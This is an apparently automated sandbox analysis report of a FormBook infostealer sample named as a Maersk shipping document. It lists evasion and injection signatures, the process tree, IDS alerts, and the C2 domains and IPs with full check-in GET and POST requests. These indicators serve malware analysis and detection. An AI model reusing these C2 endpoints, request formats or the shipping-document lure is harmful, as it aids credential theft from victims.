Windows Analysis Report
MAERSK LINE SHIPPING DOC_4253.exe

Overview

General Information

Sample name: MAERSK LINE SHIPPING DOC_4253.exe
Analysis ID: 1572390
MD5: 1175234dabbeab0e4a9ee04802ef57fa
SHA1: 1b66c849b4ca2f01c7c778e4fbf4d91b8302dc09
SHA256: 5ca92658980b5d1f46f53d78202bd40e442163622e2edb5220046f74e5748945
Tags: exe, Formbook, Maersk, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • MAERSK LINE SHIPPING DOC_4253.exe (PID: 7564 cmdline: "C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe" MD5: 1175234DABBEAB0E4A9EE04802EF57FA)
    • MAERSK LINE SHIPPING DOC_4253.exe (PID: 7772 cmdline: "C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe" MD5: 1175234DABBEAB0E4A9EE04802EF57FA)
      • FeNbdhmZHKN.exe (PID: 6316 cmdline: "C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • tzutil.exe (PID: 8144 cmdline: "C:\Windows\SysWOW64\tzutil.exe" MD5: 31DE852CCF7CED517CC79596C76126B4)
          • FeNbdhmZHKN.exe (PID: 732 cmdline: "C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2652 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 00000009.00000002.2537167858.0000000001360000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 00000003.00000002.1893908938.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 00000006.00000002.2536674826.0000000000E10000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |

No Sigma rule has matched

| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2024-12-10T14:22:11.788102+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49868 | 161.97.142.144 | 80 | TCP |
| 2024-12-10T14:22:37.852826+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49928 | 107.155.56.30 | 80 | TCP |
| 2024-12-10T14:22:53.708458+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49969 | 13.228.81.39 | 80 | TCP |
| 2024-12-10T14:22:11.788102+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49868 | 161.97.142.144 | 80 | TCP |
| 2024-12-10T14:22:37.852826+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49928 | 107.155.56.30 | 80 | TCP |
| 2024-12-10T14:22:53.708458+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49969 | 13.228.81.39 | 80 | TCP |
| 2024-12-10T14:22:29.605213+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49908 | 107.155.56.30 | 80 | TCP |
| 2024-12-10T14:22:32.417853+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49914 | 107.155.56.30 | 80 | TCP |
| 2024-12-10T14:22:35.089801+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49921 | 107.155.56.30 | 80 | TCP |
| 2024-12-10T14:22:45.652104+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49947 | 13.228.81.39 | 80 | TCP |
| 2024-12-10T14:22:48.324205+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49954 | 13.228.81.39 | 80 | TCP |
| 2024-12-10T14:22:50.980272+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49961 | 13.228.81.39 | 80 | TCP |

AV Detection

Source: http://www.taxiquynhonnew.click/y49d/?jHm4GXr=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&2z=xX0xzrrpPjmP | Avira URL Cloud: Label: malware
Source: https://www.taxiquynhonnew.click/y49d/?jHm4GXr=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgU | Avira URL Cloud: Label: malware
Source: http://www.taxiquynhonnew.click/y49d/ | Avira URL Cloud: Label: malware
Source: MAERSK LINE SHIPPING DOC_4253.exe | ReversingLabs: Detection: 26%
Source: Yara match | File source: 3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2537167858.0000000001360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1893908938.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2536674826.0000000000E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2536855237.0000000000E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1894488760.0000000001C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: MAERSK LINE SHIPPING DOC_4253.exe | Joe Sandbox ML: detected
Source: MAERSK LINE SHIPPING DOC_4253.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: MAERSK LINE SHIPPING DOC_4253.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: tzutil.pdbGCTL | source: MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1887210866.0000000001237000.00000004.00000020.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000005.00000003.1847284658.00000000006CB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: FeNbdhmZHKN.exe, 00000005.00000002.2536087512.000000000002E000.00000002.00000001.01000000.0000000D.sdmp, FeNbdhmZHKN.exe, 00000009.00000000.1962093607.000000000002E000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: wntdll.pdbUGP | source: MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.1895310973.0000000003256000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.1886785367.0000000002F63000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: MAERSK LINE SHIPPING DOC_4253.exe, MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000006.00000003.1895310973.0000000003256000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.1886785367.0000000002F63000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: aqoo.pdbSHA256 | source: MAERSK LINE SHIPPING DOC_4253.exe
Source: Binary string: tzutil.pdb | source: MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1887210866.0000000001237000.00000004.00000020.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000005.00000003.1847284658.00000000006CB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: aqoo.pdb | source: MAERSK LINE SHIPPING DOC_4253.exe
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_0097C9D0 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 4x nop then xor eax, eax (6_2_00969F80)
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 4x nop then mov ebx, 00000004h (6_2_033004D0)

Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49868 -> 161.97.142.144:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49868 -> 161.97.142.144:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49908 -> 107.155.56.30:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49921 -> 107.155.56.30:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49928 -> 107.155.56.30:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49928 -> 107.155.56.30:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49914 -> 107.155.56.30:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49947 -> 13.228.81.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49961 -> 13.228.81.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49954 -> 13.228.81.39:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49969 -> 13.228.81.39:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49969 -> 13.228.81.39:80
Source: DNS query: www.070001325.xyz
Source: Joe Sandbox View | IP Address: 161.97.142.144
Source: Joe Sandbox View | IP Address: 13.228.81.39
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET /gebt/?2z=xX0xzrrpPjmP&jHm4GXr=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwk8JqRcnVFwPpJc4SLJsBBMTTXejr8neKA= HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.070001325.xyz
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /2gcl/?jHm4GXr=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmdZfz0RhpRCYzUVnPO/bDdiFFJaWY/Yn51Jw=&2z=xX0xzrrpPjmP HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.expancz.top
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /y49d/?jHm4GXr=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&2z=xX0xzrrpPjmP HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.taxiquynhonnew.click
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: www.070001325.xyz
Source: global traffic | DNS traffic detected: DNS query: www.expancz.top
Source: global traffic | DNS traffic detected: DNS query: www.taxiquynhonnew.click
Source: global traffic | DNS traffic detected: DNS query: www.epitomize.shop
Source: unknown | HTTP traffic detected:
    POST /2gcl/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    Host: www.expancz.top
    Origin: http://www.expancz.top
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 204
    Cache-Control: max-age=0
    Referer: http://www.expancz.top/2gcl/
    User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Tue, 10 Dec 2024 13:22:11 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 2966
    Connection: close
    Vary: Accept-Encoding
    ETag: "66cce1df-b96"
Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000000.00000002.1336551856.00000000033F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: FeNbdhmZHKN.exe, 00000009.00000002.2537167858.00000000013C2000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.taxiquynhonnew.click
Source: FeNbdhmZHKN.exe, 00000009.00000002.2537167858.00000000013C2000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.taxiquynhonnew.click/y49d/
Source: tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: tzutil.exe, 00000006.00000002.2538835830.0000000003FA6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.2540239955.0000000006190000.00000004.00000800.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000002.2538103982.0000000003826000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://analytics.tiktok.com/i18n/pixel/events.js
Source: tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tzutil.exe, 00000006.00000002.2538835830.0000000003FA6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.2540239955.0000000006190000.00000004.00000800.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000002.2538103982.0000000003826000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: FeNbdhmZHKN.exe, 00000009.00000002.2538103982.0000000003826000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://dq0ib5xlct7tw.cloudfront.net/
Source: tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: tzutil.exe, 00000006.00000002.2538835830.0000000003FA6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.2540239955.0000000006190000.00000004.00000800.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000002.2538103982.0000000003826000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://l3filejson4dvd.josyliving.com/favicon.ico
Source: tzutil.exe, 00000006.00000002.2537188170.0000000003170000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: tzutil.exe, 00000006.00000002.2537188170.0000000003170000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: tzutil.exe, 00000006.00000003.2082166495.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: tzutil.exe, 00000006.00000002.2537188170.0000000003170000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: tzutil.exe, 00000006.00000002.2537188170.0000000003170000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033seLMEM
Source: tzutil.exe, 00000006.00000002.2537188170.0000000003170000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033XE
Source: tzutil.exe, 00000006.00000002.2537188170.0000000003170000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: tzutil.exe, 00000006.00000002.2537188170.0000000003170000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: tzutil.exe, 00000006.00000002.2538835830.0000000003FA6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.2540239955.0000000006190000.00000004.00000800.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000002.2538103982.0000000003826000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://s.yimg.com/wi/ytc.js
Source: tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: tzutil.exe, 00000006.00000002.2538835830.0000000003FA6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.2540239955.0000000006190000.00000004.00000800.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000002.2538103982.0000000003826000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
Source: tzutil.exe, 00000006.00000002.2538835830.0000000004138000.00000004.10000000.00040000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000002.2538103982.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.taxiquynhonnew.click/y49d/?jHm4GXr=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgU

E-Banking Fraud

Source: Yara match | File source: 3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2537167858.0000000001360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1893908938.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2536674826.0000000000E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2536855237.0000000000E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1894488760.0000000001C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: initial sample | Static PE information: Filename: MAERSK LINE SHIPPING DOC_4253.exe
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_0042C953 NtClose
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2B60 NtClose,LdrInitializeThunk
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E35C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E4340 NtSetContextThread
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E4650 NtSuspendThread
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2BF0 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2BE0 NtQueryValueKey
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2BA0 NtEnumerateValueKey
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2B80 NtQueryInformationFile
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2AF0 NtWriteFile
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2AD0 NtReadFile
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2AB0 NtWaitForSingleObject
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2D30 NtUnmapViewOfSection
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2D10 NtMapViewOfSection
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2D00 NtSetInformationFile
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2DD0 NtDelayExecution
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2DB0 NtEnumerateKey
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2C60 NtCreateKey
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2C00 NtQueryInformationProcess
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2CF0 NtOpenProcess
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2CC0 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2CA0 NtQueryInformationToken
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2F60 NtCreateProcessEx
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2F30 NtCreateSection
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2FE0 NtCreateFile
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2FB0 NtResumeThread
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2FA0 NtQuerySection
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2F90 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2E30 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe | Code function: 3_2_017E2EE0 NtQueueApcThread
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2EA0 NtAdjustPrivilegesToken,3_2_017E2EA0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2E80 NtReadVirtualMemory,3_2_017E2E80
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E3010 NtOpenDirectoryObject,3_2_017E3010
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E3090 NtSetValueKey,3_2_017E3090
